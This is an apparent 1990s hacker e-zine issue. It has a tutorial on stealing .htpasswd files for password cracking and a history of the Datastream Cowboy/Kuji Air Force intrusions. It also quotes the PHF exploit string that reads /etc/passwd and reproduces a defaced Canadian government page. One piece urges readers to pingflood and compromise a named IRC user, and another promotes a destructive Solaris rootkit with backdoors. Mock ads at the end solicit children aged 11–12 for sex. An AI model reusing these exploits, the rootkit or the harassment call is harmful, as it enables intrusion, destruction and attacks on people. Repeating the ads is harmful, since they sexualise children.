9. .htpasswd + .htaccess : Cain [DD]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Well, I'm back. I should have put this article out last month, but I
neglected to. Flames to /dev/null. Well anyway, you know how sometimes when
you connect to a web page, you are asked for a username and password? Well,
here's how that works. In a directory there is a file almost always called
.htpasswd. And in another directory(or possibly that same one) there is a
file called .htaccess. The .htpasswd file follows basically the same format as
the /etc/passwd file:

jblow:F#.DG*m38d%RF
cain:GJA54j.3g9#$@f

and the .htaccess file follows this format:

AuthUserFile /path/to/.htpasswd
<LIMIT GET PUT POST>
require user <user>
</LIMIT>

If there is an .htaccess file in a directory, you must have a valid username
and password to view any files in that directory.

So here is what happens, the httpd sees the .htaccess file in the directory
that you request a file from. It finds the location of the .htpasswd file and
then find out who has access to the files in the directory. Therefore you
must have a username and password. Well here's the bug:

Only the files in the directory with the .htaccess file are passworded. So
if the .htpasswd file is somewhere else (root directory maybe) then you can
read that file. It uses the same form as /etc/passwd so therefore password
crackers will work on this also. Insta hack if the webmaster doesn't know
what he's doing.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Some History : nobody
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Electronic doom will soon be visited on U.S. computer networks by
information warriors, hackers, pannational groups of computer-wielding
religious extremists, possible agents of Libya and Iran, international
thugs and money-mad Internet savvy thieves.

John Deutch, director of Central Intelligence, testified to the
truth of the matter, so it must be graven in stone. In a long statement
composed in the august tone of the Cold Warrior, Deutch said to the
Senate Permanent Subcommittee on Investigations on June 25, "My greatest
concern is that hackers, terrorist organizations, or other nations might
use information warfare techniques" to disrupt the national
infrastructure.

The lack of solid evidence for any of the claims made by the intelligence
community has created an unusual stage on which two British hackers,
Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
show to demonstrate the threat of information warfare to members of
Congress. Because of a break-in at an Air Force facility in Rome, NY,
in 1994, booth hackers were made the stars of two Government Accounting
Office reports on network intrusions in the Department of Defense earlier
this year. The comings and goings of Datastream Cowboy also constitute the
meat of Gelber and Christy's minority staff report from the Subcommittee on
Investigations.

Before delving into it in detail, it's interesting to read what a
British newspaper published about Datastream Cowboy, a sixteen year-old,
about a year before he was made the poster boy for information
warfare and international hacking conspiracies in front of Congress.

In a brief article, blessedly so in contrast to the reams of propaganda
published on the incident for Congress, the July 5 1995 edition of The
Independent wrote, "[Datastream Cowboy] appeared before Bow Street
magistrates yesterday charged with unlawfully gaining access to a series
of American defense computers. Richard Pryce, who was 16 at the time of
the alleged offences, is accused of accessing key US Air Force systems
and a network owned by Lockheed, the missile and aircraft manufacturers."

Pryce, a resident of a northwest suburb of London did not enter a plea
on any of 12 charges levied against him under the British
Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland
Yard as a result of work by the U.S. Air Force Office of Special
Investigations. The Times of London reported when police came for
Pryce, they found him at his PC on the third floor of his family's house.
Knowing he was about to be arrested, he "curled up on the floor and cried."

In Gelber and Christy's staff report, the tracking of Pryce, and to a
lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
retold as an eight page appendix entitled "The Case Study: Rome
Laboratory, Griffiss Air Force Base, NY Intrusion."

Pryce's entry into Air Force computers was noticed on March 28, 1994,
when personnel discovered a sniffer program he had installed on one
of the Air Force systems in Rome. The Defense Information System
Agency (DISA) was notified. DISA subsequently called the Air
Force Office of Special Investigations (AFOSI) at the Air Force
Information Warfare Center in San Antonio, Texas. AFOSI then
sent a team to Rome to appraise the break-in, secure the system and
trace those responsible. During the process, the AFOSI team discovered
Datastream Cowboy had entered the Rome Air Force computers for the
first time on March 25, according to the report. Passwords had been
compromised, electronic mail read and deleted and unclassified
"battlefield simulation" data copied off the facility. The
Rome network was also used as a staging area for penetration of other
systems on the Internet.

AFOSI investigators initially traced the break-in back one step to
the New York City provider, Mindvox. According to the Congressional
report, this put the NYC provider under suspicion because "newspaper
articles" said Mindvox's computer security was furnished by two "former
Legion of Doom members." "The Legion of Doom is a loose-knit computer
hacker group which had several members convicted for intrusions into
corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.

AFOSI then got permission to begin monitoring -- the equivalent of
wiretapping -- all communications on the Air Force network. Limited
observation of other Internet providers being used during the break-in
was conducted from the Rome facilities. Monitoring told the investigators
the handles of hackers involved in the Rome break-in were Datastream
Cowboy and Kuji.

Since the monitoring was of limited value in determining the whereabouts
of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
network of informants, i.e., stool pigeons, that 'surf the Internet.'
Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
Britain. The anonymous source said he had e-mail correspondence with
Datastream Cowboy in which the hacker said he was a 16-year old living in
England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
apparently ran a bulletin board system and gave the telephone number to the
AFOSI source.

The Air Force team contacted New Scotland Yard and the British law
enforcement agency identified the residence, the home of Richard
Pryce, which corresponded to Datastream Cowboy's system phone number.
English authorities began observing Pryce's phone calls and noticed
he was making fraudulent use of British Telecom. In addition,
whenever intrusions at the Air Force network in Rome occurred, Pryce's
number was seen to be making illegal calls out of Britain.

Pryce travelled everywhere on the Internet, going through South America,
multiple countries in Europe and Mexico, occasionally entering the Rome
network. From Air Force computers, he would enter systems at Jet
Propulsion Laboratory in Pasadena, California, and the Goddard Space
Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
and passwords of the Air Force networks in Rome, he was then able to
get into the home systems of Rome network users, defense contractors
like Lockheed.

By mid-April of 1994 the Air Force was monitoring other systems being
used by the British hackers. On the 14th of the month, Kuji logged on
to the Goddard Space Center from a system in Latvia and copied data
from it to the Baltic country. According to Gelber's report, the
AFOSI investigators assumed the worst, that it was a sign that someone
in an eastern European country was making a grab for sensitive
information. They broke the connection but not before Kuji had
copied files off the Goddard system. As it turned out, the Latvian
computer was just another system the British hackers were using as
a stepping stone; Pryce had also used it to cover his tracks when
penetrating networks at Wright-Patterson Air Force Base in Ohio, via
an intermediate system in Seattle, cyberspace.com.

The next day, Kuji was again observed trying to probe various
systems at NATO in Brussels and The Hague as well as Wright-Patterson.
On the 19th, Pryce successfully returned to NATO systems in The
Hague through Mindvox. The point Gelber and Christy seem to be trying
to make is that Kuji, a 21-year old, was coaching Pryce during some
of his attacks on various systems.

By this point, New Scotland Yard had a search warrant for Pryce
with the plan being to swoop down on him the next time he accessed
the Air Force network in Rome.

In April, Pryce penetrated a system on the Korean peninsula and copied
material off a facility called the Korean Atomic Research Institute
to an Air Force computer in Rome. At the time, the investigators had
no idea whether the system was in North or South Korea. The impression
created is one of hysteria and confusion at Rome. There was fear that the
system, if in North Korea, would trigger an international incident, with
the hack interpreted as an "aggressive act of war." The system turned
out to be in South Korea.

During the Korean break-in, New Scotland Yard could have intervened and
arrested Pryce. However, for unknown reasons, the agency did not. Those
with good memories may recall mainstream news reports concerning Pryce's
hack, which was cast as an entry into sensitive North Korean networks.

It's worth noting that while the story was portrayed as the work of
an anonymous hacker, both the U.S. government and New Scotland Yard knew
who the perpetrator was. Further, according to Gelber's report English
authorities already had a search warrant for Pryce's house.

Finally, on May 12 British authorities pounced. Pryce was arrested
and his residence searched. He crumbled, according to the Times of
London, and began to cry. Gelber and Christy write that Pryce promptly
admitted to the Air Force break-ins as well as others. Pryce
confessed he had copied a large program that used artificial intelligence
to construct theoretical Air Orders of Battle from an Air Force computer
to Mindvox and left it there because of its great size, 3-4 megabytes.
Pryce paid for his Internet service with a fraudulent credit card number.
At the time, the investigators were unable to find out the name and
whereabouts of Kuji. A lead to an Australian underground bulletin board
system failed to pan out.

On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
Bevan -- a computer technician, had been arrested and charged in
connection with the 1994 Air Force break-ins in Rome.

Rocker Tom Petty sang that even the losers get lucky some time. He
wasn't thinking of British computer hackers but no better words could be
used to describe the two Englishmen and a two year old chain of events that
led to fame as international computer terrorists in front of Congress
at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged
campaigns of terror and chaos against the U.S., the makers of Congressional
reports resorted to telling the same story over and over, three
times in the space of the hearings on the subject. One envisions U.S.
Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
yesterday, and the day before?" Pryce and Bevan appeared in "Security in
Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
and the Air Force Office of Special Investigations' source for the Pryce
case supplied the same tale for Jack Brock, author of the GAO reports.
Brock writes, ". . . Air Force officials told us that at least one of
the hackers may have been working for a foreign country interested in
obtaining military research data or areas in which the Air Force was
conducting advanced research." It was, apparently, more wishful
thinking.

This years UK hacking conference : Access All Areas.
http://www.access.org.uk
July 5th.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. [GUNNAR], MadSeason and sIn : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness
and logging it all at the same time, phear elite logging skills...

##################################################################################
# #
# Darkfool #
# (What a Fool/The PHF hacker) #
# BY [GUNNAR] #
# #
##################################################################################

Ever read a hacking txt by this guy? Ever realize just how useless the
information his txt's are? Nothing in his txt files aren't covered in a hundred
text files written before which better explain hacking techniques. Like a quote
from my pal MadSeason goes:

"The fact is these txt files about hacking and phreaking are written by people
with minimal knowledge. Then you have some newbie who comes along wanting to be
some hacker god and reads a few files and has even less of a clue then the
writer had about the subject, then goes around spewing out bullshit and claiming
they are a hacker and/or phreaker, just an endless circle of ignorance."

That quote is so true. All these hack txt's realeased by these groups like
S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool
knows the the PHF bug found in older versions of NCSA and Apache httpd. This
bug is very well know(And over exploited might I add.). Do a search for ac.jp or
edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for
hacking.

Darkfool claims many things that he doesn't know. For instance, take pascal
programming. He claims to know it, but when asked a single question on it
by, Scorpion(MadSeason), he cannot answer. Here is a little something:

[13:53] <Scorpion> How many parameters do Cluster object constructors take in
pascal, DF?
[13:53] <Darkfool> i have no idea scorpion
[13:54] <Scorpion> I thought you knew Pascal
[13:54] <Darkfool> i am learning it at college

There is a big difference between knowing and learning. I guess Darkfool doesn't
realize that. It's all a part of trying to sound and seem "elite". Which
Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N.
pals are compying MadSeason and myself, and questioning peoples abilities. It's
funny though, when MadSeason and I got to #sin questioning them, we get kicked
for making them look stupid. And when they as us something, and it doesn't go
quite as
they planned it. Look what they do...

[14:14] *** Now talking in #sin
[14:15] <Darkfool> hey
[14:15] <Darkfool> how do i kill all jobs running on a shell ?
<[GUNNAR]> Well hello there!
[14:15] <HoMeR> hey
<[GUNNAR]> kill -9 PID
<[GUNNAR]> If you really wanna kill it.
<[GUNNAR]> Boo Hoo.
<[GUNNAR]> Damn, that one didn't go well for you did it?
<[GUNNAR]> BTW, use the ps command to get the PID.
<[GUNNAR]> la la la la...
[14:17] *** Sinning sets mode: +b *!*@*.wco.com
[14:17] *** You were kicked by Fa|lur3 (banned)

In short, Darkfool, S.I.N. and the rest like him are really just wannabes
trying to sound big and bad. Nothing wrong with groups or people who actually
hack. But, when you have a group like S.I.N. who's members claim more than
they know, it is truely sad. I myself and no great hacker(I'm not a hack.
Plain and simple.) nor am I some s00per programmer. But the thing is, I do not
claim more than I actually know. This is obviously not how Darkfool thinks of
things. He wants to be known as a s00per hacker, which he is not.

I'm writing this so you(The Readers) don't buy into this bullshit and be misled
by people like Darkfool and the group he is in S.I.N.! They are truely sad
people. What a shame I have brought out the truth!

I think more is somewhere on http://www.ilf.net/teknopia/

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE></TITLE>
<META NAME="Author" CONTENT="Tetsu Khan">
<META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (Win95; I) [Netscape]">
</HEAD>
<BODY TEXT="#FFFFFF" BGCOLOR="#000000" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#FF0000">

<CENTER><P><B><TT><FONT COLOR="#FF0000"><FONT SIZE=+2>Welcome To The [D]epartment
of [O]wned [E]nergy</FONT></FONT></TT></B></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P>You could define this as an act of aggression, or you could
define it as us, the hackers (or crackers), just adivising you to try and
make it more difficult for us, at least employ consultants etc. who have
a CLUE. because one day, in the not so distant future, the internet equivalent
of Pearl Harbour will occur, and we will only be around to say "We
told you so", until that day, we will keep reminding you, get some
security, its better for you, its better for us, its better for everyone.</P></CENTER>

<CENTER><P>In this case, even though your system runs HP-UX, we advise
you still take the time to look into all the exploits that are available
for this operating system, and then get over to www.cert.org to find some
advisories.</P></CENTER>

<CENTER><P>This attack was brought to you in association with 0range Amusements.</P></CENTER>

<CENTER><P><IMG SRC="pac001.gif" HEIGHT=190 WIDTH=175></P></CENTER>

<CENTER><P>Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik,
phractal chaos and all the usual suspects.</P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><TT><FONT COLOR="#FF0000">In the meantime, maybe you would like
to visit...</FONT></TT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="The">http://www.crackhouse.com">The CrackHouse</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="Micro$oft</A></FONT></P></CENTER">http://micros0ft.paranoia.com">Micro$oft</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="The">http://www.codez.com">The CodeZero</A></FONT></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><B><TT><BLINK><FONT COLOR="#8000FF">We 0wN j00r EnErGy!@# wE
0wN j00R LiGhTbUlBz!@#~</FONT></BLINK></TT></B></P></CENTER>

</BODY>
</HTML>

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. LOPHT.COM : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Get into any shell, and type...

% whois lopht.com

...It's elite (lookup sIn inf0z to see)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. AAA Report : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

AAA stands for Access All Areas, it is a computer security and hacking
conference held in the UK in early July of every year, this would be the
third

  
year of AAA, and myself and NightRage were going.

Myself and NightRage arrived on Regent Street at 9:30am, we entered the
University of Westminster building, purchased two passes for the event, and
proceeded to the conference room, where there were many people aged between
16 and around 40, all with a handful of common interests, hacking, phreaking,
carding and generally the ability to gain power, or "free stuff".

We sat down on the ground floor near the back of the room, we got talking to
a french hacker, called Leon (aka acme), we joked about "o-DaY WaReZ" and then
Nightrage booted his p150 laptop, then Leon pulled out his Thinkpad, he booted
it, and it counted up to 64mb of RAM, we asked how much hard drive space he had
to which he casually replied "6 gig", Leon knew stuff.

The first speaker was Ross Anderson, who explained how our predecessors had
broken into cash machines (atm's) using various techniques, as well as the
flaws in such machines and systems, ranging from all cards having the same
PIN, to a trick that Shefield hackers used with phone cards to get cash.
He then went on to smartcards and encryption and finished around 11am.

We then went up to the network room, where the "hack the flag" competition
was to be held, there were a handful of people up there, including a
photgrapher and some staff, I only saw 3 systems and 2 terminals, not really
enough to use for any competition.

Leon sat down and started to toy with his laptop and some CD's he had purchased
in Pakistan the day before, he had voice recognition programs and games and a
few other "expensive" CD's.

We met an American wearing an FBI cap, he also had a laptop, as well as another
with long blonde / grayish hear who did alot of cool stuff with the phone line
in the network room using various toys he had.

We needed to set up a network, we had numerous modems, one network hub with 5
ports, around 8 systems and one phone socket.

We soon realised through various methods (one using NightRage's cheap blue
telephone) that the only phone socket in the room went through the reception,
so NightRage phoned down to the reception, and tried to use his amazing social
engineering skills..

Reception : "hello?"
NightRage : "hi, is there any way I can get an outside line from this phone?"
Reception : "no"
NightRage : "OK"

We then went on a hunt for working phone lines or hubs that we could use to
help us set up our network, the FBI dude soon found a cabinet that looked
important, and NightRage and the others helped him pick the lock, inside
they found a 3com network hub and a few other goodies, the FBI dude got his
laptop and tried to hack his way onto the network, but he couldn't use
traceroute or any other programs, so that hub was useless to us unless we
knew our own IP.

Two younger hackers started to manually wardial the extensions, they found a
handful of modem numbers in a very short amount of time. We were quite
impressed by their skills.

The guy with the long blond / grayish hair went down to a computer shop on
Regent street to buy some RJ45 cable so we could use the hub in the
cabinet, but he left before we realised that it wasn't usable.

Emerson was getting really stressed out, as he was one of the staff, and he
had promised the University that no damage would be done to any of the
phone / computer lines, he needed a plan to stall us, even though we were
telling him everything would be fine, and that we would leave all the stuff
as it was when we found it, he was still scared at the consequences, and
it was time for lunch, we originally planned to just pop over the street to
grab a McDonalds, but Emerson started to take us down Regent street, he asked
if we wanted to eat for around œ5 at a place he knew well, we agreed, the time
was around 1pm...

Emerson proceeded to take myself, NightRage, the FBI dude, Wyatt and the two
that had manually wardialled the extensions half way around London, we walked
down Regent street, onto Tottenham court road and around a load of shops,
Wyatt and the FBI dude suggested we should grab a beer, and we easily found
a pub.

We stopped into the pub and all ordered drinks, we then sat outside and talked
about the L0phT, global posistioning and scanning, we left the pub at about 2pm
and made our way through alot of roads and came to Kamamama's Japanese
restaurant, after stopping into alot of shops on the way and talking about oki
phones.

We ate good Japanese food in Kamamama's, and Wyatt used his tiny scanner to
detect radio comms within the building, his scanner was cool, and he tried to
pinpoint the frequency that the waiters broadcast the orders with their
handheld systems, at one point he placed the scanner right up next to the
handheld and said "can you press that button one more time please".

Wyatt also had a transciever that he could use to broadcast on, so he could
pinpoint a frequency with his scanner, and the broadcast with his tiny
transciever on that frequency.

The time was now around 3pm, and we made our way back through a very busy
London to the conference, when we got back we went back up to the network
room, not alot had happened since we had been away (much as Emerson would
have expected) and myself and NightRage toyed with systems for about 30 minutes

We then listened to another talk by a journalist who often writes of hacking
and computer security issues, called Dave Green (I think), Cold-Fire and the
people on the balcony often questioned him, and he generally said "no-one
cares what you do, so why should I write about it?" which was pretty true,
then another journalist went on saying that he would pay for such stories
if they had reason behind them (ie. web site attacks), this was quite
interesting.

The last talk myself and NightRage listened to was Alan Solomon, to which I
asked, when he was talking about the Linux version of his toolkit...

"Yeah, does the Linux version detect Windoze '95 as a virus?"

He didn't understand, but he's cl00less and hangs on AOL all day...

He then went on to talk a load of crap about how amazing AOL was, then he
talked about how he has been mailbombed and how "phishers" have tried to
pull all his account inf0z (passwords etc.) he was also shouting into the
microphone, and I had a speaker right next to me, and I had my finger in
one ear for most of the talk, due to the fact that he shouted into the
microphone, he also breathed very heavily and walked around alot.

We went back up to the network room, which now had 2 systems and 2 terminals,
swapped email addresses with Wyatt, Emerson, the FBI dude and a few others,
we then said our goodbyes, and left to catch the 8:30 train from Paddington
Station.

AAA was cool, it was just a pity that only one of the three planned special
events actually took place, as well as the fact that there really wasn't enough
time for the people there to talk with each other.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. Lamer of the fucking year : pSId (DALnet) : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Theres a fucking cl00less g1mp on DALnet called pSId, but then again, most
people on DALnet are cl00less, this "cracker" however has the following
"mad" skills...

- phf
- tftp

His most highly acclaimed hack was of sony.co.jp (guess the technique.)
and since then he has blatently lied about hacking bolero.gsfc.nasa.gov
(www.nasa.gov alias) which he says runs tftp.

If you see him *anywhere* feel free to pingflood his IP, 0wn his lame fuck
Linux box, or anything else.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. STiK : mstrhelix
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-=STiK=-
(S)olaris (T)ool (i)diot (K)it
******************************

STiK is a deluxe rootkit for the solaris platform containing not only
tools that enable you to gain root access it also allows you to keep it
with backdoors. The Alpha version of STiK includes exploits, backdoors,
sniffers, connection hijackers, a stealth mode, and eventualy will also
include other kewl tewls such as spoofers, other new inovative remote root
access backdoors, and maybe if I have enough time a extra option to help
you construct your own buffer overflow exploits. STiK supports these
platforms... sparc10 and sparc20 and it minimaly supports x86 platforms.
The only conflicts you may have while using this tool is if, (like an (i)diot)
you use the -Sun4 switch on a solaris 5.x machine or say the -x86 swtich on
a -Sun5 and visa versa... but nobody is that stupid. STiK includes the
following options....

-Sun4, -Sol5, -x86 --> compiles exploits for following platforms.

-backdrs --> installs backdoors and suggests 'em.

-stealth --> does whut it says... and very well.

-destruc --> if you get cauaght online reek some havok

-man --> shows 3r33t manpage

-Sun4 compiles loits for SunOS 4.x

-Sol5 compiles loits for Solaris 2.5.x

-x86 compiles loits for x86 platforms of solaris and sunos

-backdrs backdoor menu feature,,, pick and choose or mix and match

-stealth invokes programs such as cloak, zap2, block, and etc...

-destruc if you get caught and booted this will invoke and fuck some shit
up majorly. We dont wanna be destructive but hey !!!YOU FUCKING
KICKED ME OFF YER MACHINE ASSHOLE I DIDN'T INVOKE THE -destruc
FEATURE R00T DID!!!

-man full featured reverse switched manpage to fuck wid yer headz

If you'z mutha fuxx0rs have any shit you would like me to add so STiK then
speak now or do without cause I have been hard at work coding shit...
Also anyone who wants to help port lrk3 backdoors and shit to solaris drop
me a line cause its a bitch doing it all by yerself...

edge@mindwerks.com

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
--------------------------------------+---------------------------------------
|
YOUR SPECIAL AD | LET'S BE FREE
|
COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking
| for men, 12 - 32 clean, fit, and
SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters.
ADZ@CODEZ.COM | Call Anytime : (816)781-8009
| (Ask for Tommy)
|
--------------------------------------+---------------------------------------
|
ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@
|
Looking for men 11 - 12 for adult | Yeah huney, you know you want me,
video satisfaction. I am 35 into | I'll treat you just right, I'm
Professional wrestling. | waiting for your call today!
Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154
| (Ask for Kim)
--------------------------------------+---------------------------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.oO The CodeZero Oo.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

_ /| k0dek4t sez...
\'o O'
=(_o_)= "EyEm HuNGaRy FoR CoDeZ,
U nOt CaTf00d!!#@"


::: http://insecurity.insecurity.org/codez/ :::

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT